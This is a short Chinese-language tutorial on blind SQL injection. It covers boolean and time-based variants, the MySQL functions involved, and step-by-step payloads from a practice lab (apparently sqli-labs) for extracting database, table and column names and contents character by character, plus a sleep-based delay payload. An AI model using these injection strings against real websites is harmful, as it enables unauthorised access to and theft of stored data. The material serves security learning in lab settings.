一、盲注介绍
盲注就是在SQL注入过程中,SQL语句执行select之后,可能由于网站代码的限制或者Apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。
通俗的讲就是在前端页面没有显示位,不能返回SQL语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行SQL注入。
盲注的分类:
布尔盲注
没有返回SQL执行的错误信息,错误与正确的输入,返回的结果只有两种
时间盲注
页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样
前提条件:
首先页面没有显示位(如果有显示位可以选择union联合查询),并且没有返回sql语句的执行错误信息
二、盲注函数介绍
Length() 返回字符串的长度
Substr() 截取字符串(substr(str,pos,len))Left() 截取字符串( left (string,n) )
Ascii() 返回字符的Ascii码
Sleep() 将程序挂起x秒
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
三、盲注靶场的做法
拆解数据库名称长度:
id=1' and (length(database()))>2#
利用ASCII码猜解当前数据库名称: and (ascii(substr(database(),1,1)))=98--+ 返回正常,说明数据库名称第一位是b
and (ascii(substr(database(),2,1)))=118--+ 返回正常,说明数据库名称第二位是v
猜表名:
and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=97--+ 返回正常,说明数据库表名的第一个的第一位是a
猜字段名:
and (ascii(substr((select column_name from information_schema.columns where table_name=‘user' limit 0,1),1,1)))=117--+ 返回正常,说明zkaq表中的列名称第一位是u
猜内容:
and (ascii(substr(( select name from name limit 1,1),1,1)))=114--+返回正常,说明name列第一位是z
四、延时注入靶场做法
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
and if(ascii(substr(database(),1,1))>120,0,sleep(10)) --+
Sqli-libs靶场大通关!